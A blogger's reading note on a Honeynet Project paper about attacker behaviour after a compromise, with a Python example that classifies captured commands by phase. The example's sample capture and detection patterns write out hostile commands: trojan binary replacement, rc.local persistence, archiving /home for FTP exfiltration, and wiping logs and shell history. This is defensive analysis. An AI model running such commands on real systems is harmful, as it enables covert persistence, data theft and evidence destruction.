Reading the September Honeynet paper

The Honeynet Project has published a substantial new instalment in their Know Your Enemy paper series. The focus this time is post-compromise attacker behaviour observed across the project's distributed sensor network. A reading note.

This is a longer post because the paper is substantive and the operational lessons are worth treating carefully.

What the paper covers

The paper draws on data from the Honeynet Project's distributed sensors over the past 18 months. The focus is what attackers do after they have compromised a host — the often-undocumented operational period between initial exploitation and either persistence-and-leave or active use.

Specific topics covered:

Tool-chain deployment patterns. What tools attackers download, how they download them, where they store them. The patterns are surprisingly consistent across compromise events; specific toolchains recur.

Persistence techniques. How attackers ensure they retain access. Specific patterns: replacing system binaries, modifying init scripts, deploying scheduled tasks, hiding files in unusual paths.

Post-compromise reconnaissance. What attackers look at before doing further work. Specific patterns: enumerating users, examining mail spools, listing recent file activity, examining network configuration.

Data exfiltration patterns. How attackers extract data. Specific patterns: tar archives uploaded to specific FTP servers, encrypted archives, occasionally email-based exfiltration through compromised accounts.

Lateral movement. How compromised hosts are used to compromise other hosts. Specific patterns: scanning the local network, attempting credential reuse, exploiting trust relationships.

The cumulative picture is detailed. The post-compromise period is shown to have specific structure that is observable through proper instrumentation.

What is structurally novel

Three findings I had not seen documented at this depth.

Skilled human attackers spend most of their time on reconnaissance. The actual exploitation is brief; the actual persistence deployment is brief; the time spent looking at the compromised host's contents and connections is substantial. The behavioural pattern matches what intelligence-gathering rather than damage-causing intent would predict.

Specific tool-chains are reused across many compromises. The same patterns of tool deployment recur. This is informative about the threat-actor population: specific toolchains are shared among specific operator groups; the toolchains themselves are evidence of group identity even when other identifying features are obscured.

Cleanup behaviour is surprisingly thorough among skilled attackers. Logs are tampered with; specific traces are removed; the host is sometimes left in better condition (from the attacker's perspective) than when it was compromised. The cleanup discipline is consistent with intelligence-collection rather than vandalism.

The trajectory of the findings suggests the threat-actor population includes a meaningful fraction of skilled, deliberate, careful actors. The mass-of-amateurs framing that dominated earlier security writing does not match the current data.

What this teaches operationally

Four operational lessons from the paper.

Off-host instrumentation is essential for capturing post-compromise behaviour. Skilled attackers tamper with on-host logs; they do not tamper with logs they cannot see. The Sebek-class instrumentation that captures keystrokes and command activity from outside the host is what produces the data the paper draws on.

Long observation windows produce qualitatively different findings. Snapshot data shows what attackers do at the moment of capture; sustained observation reveals what they do across time. Specific patterns visible only across sustained observation include the careful-cleanup discipline and the targeted-reconnaissance pattern.

The threat-actor population is structured. Specific toolchains, specific operational patterns, specific cleanup disciplines suggest specific groups with specific procedures. The structured population is a more useful threat model than the mass-of-amateurs framing.

Cross-operator data is more valuable than single-operator data. The Honeynet Project's distributed sensor network produces patterns that no single operator's data could produce. The cumulative cross-operator analysis is what makes the paper substantive.
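As an added example (not code from the paper or the Honeynet Project), the following Python sketches the kind of analysis that off-host command capture makes possible: it tags each captured command with one of the phases listed above and charges the idle time after each command to that phase, so the reconnaissance-heavy dwell pattern becomes measurable. The capture records and the phase regexes are constructed assumptions, not data or signatures from the paper.

```python
import re

# Phase signatures for the categories summarised above (reconnaissance,
# persistence, exfiltration, cleanup). The regexes are this example's own
# assumptions, deliberately coarse, and not the paper's.
PHASE_SIGNATURES = [
    ("reconnaissance", [r"^(w|who|last|id)\b", r"/etc/passwd",
                        r"/var/(spool/)?mail", r"\bfind\b.*-mtime",
                        r"^(ifconfig|netstat|route)\b"]),
    ("persistence", [r"^cp\b.*\s/(usr/)?s?bin/", r"/etc/(init\.d|rc)",
                     r"^crontab\b"]),
    ("exfiltration", [r"^tar\b.*-c", r"^(ftp|sftp|scp)\b"]),
    ("cleanup", [r"^rm\b.*/var/log", r">\s*/var/log/", r"^history\s+-c"]),
]

def tag_phase(command):
    """Return the first phase whose signature matches, else 'other'."""
    for phase, patterns in PHASE_SIGNATURES:
        if any(re.search(p, command) for p in patterns):
            return phase
    return "other"

def phase_dwell(records):
    """Seconds per phase. The gap after each command is charged to that
    command's phase, so time spent reading the output of a recon command
    counts as reconnaissance. records: (t_seconds, uid, command), any order."""
    ordered = sorted(records)
    dwell = {phase: 0 for phase, _ in PHASE_SIGNATURES}
    dwell["other"] = 0
    for (t, _, cmd), (t_next, _, _) in zip(ordered, ordered[1:]):
        dwell[tag_phase(cmd)] += t_next - t
    return dwell

def dominant_phase(records):
    dwell = phase_dwell(records)
    return max(dwell, key=dwell.get)

# Constructed capture (not real data): seconds since session start, uid, command.
CAPTURE = [
    (0, 0, "w"), (30, 0, "last -n 20"), (95, 0, "cat /etc/passwd"),
    (180, 0, "ls -la /var/spool/mail"), (420, 0, "find / -mtime -2 -type f"),
    (700, 0, "netstat -an"), (760, 0, "cp /tmp/.x/ps /bin/ps"),
    (780, 0, "echo /tmp/.x/run >> /etc/rc.local"),
    (800, 0, "tar -czf /tmp/.x/m.tgz /home"), (830, 0, "ftp 192.0.2.10"),
    (900, 0, "rm -f /var/log/wtmp"), (905, 0, "history -c"),
]

if __name__ == "__main__":
    total = CAPTURE[-1][0] - CAPTURE[0][0]
    for phase, secs in phase_dwell(CAPTURE).items():
        print(f"{phase:15s} {secs:5d}s  {100 * secs / total:5.1f}%")
```

On the constructed capture, reconnaissance accounts for 760 of 905 seconds, which is the shape the paper reports for skilled operators.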

What this means for my own honeypot

Two specific changes I am thinking about.

Improved off-host instrumentation. My current Sebek deployment is workable but bounded. Specific improvements (better filtering, more efficient log forwarding, capture of more activity types) would produce more comprehensive data. The investment is bounded.

More structured contribution to the broader project. I have been corresponding with several Honeynet Project researchers; my own captures could feed into the cumulative cross-operator analysis. The discipline of structured contribution requires more rigorous metadata than I currently maintain; the investment is worth considering.

For my own infrastructure: the operational discipline continues. Specific improvements will be incremental.

What this paper does not address

A few areas I would have liked to see treated:

Mobile or embedded-device compromise. The paper focuses on server-class hosts. The mobile and embedded categories are emerging; comparable structural analysis would be useful.

Long-term persistence (months or years). The paper's observation windows are weeks to months; longer observation would inform the structural understanding of intelligence-collection campaigns.

Specific commercial-cybercrime patterns. The paper covers the technical patterns; the commercial-economic patterns are mentioned but not treated in depth. The two are connected; further work would benefit from integrated treatment.

These are areas where future work could build on the current paper.

Reading recommendation

For anyone running honeypot infrastructure: read the paper carefully. The operational lessons are directly applicable.

For anyone responsible for incident response in production environments: read the paper carefully. The post-compromise behaviour described is what you will be investigating during real incidents; the patterns inform the investigation.

For anyone curious about the structural shape of the threat-actor population: read the paper carefully. The careful-attacker pattern documented is the operationally significant population.

The paper is, on balance, the most substantial piece of public security research I have read this year. The investment of reading time is bounded; the cumulative knowledge is meaningful.

A specific note on the project

The Honeynet Project is a volunteer effort that has produced consistent quality across multiple papers over multiple years. The cumulative output is substantial; the contribution to the field is real.

For anyone in a position to contribute (financially, with sensor data, with research time): the project benefits. For anyone consuming the output: the work depends on the volunteer effort behind it.

More in time.
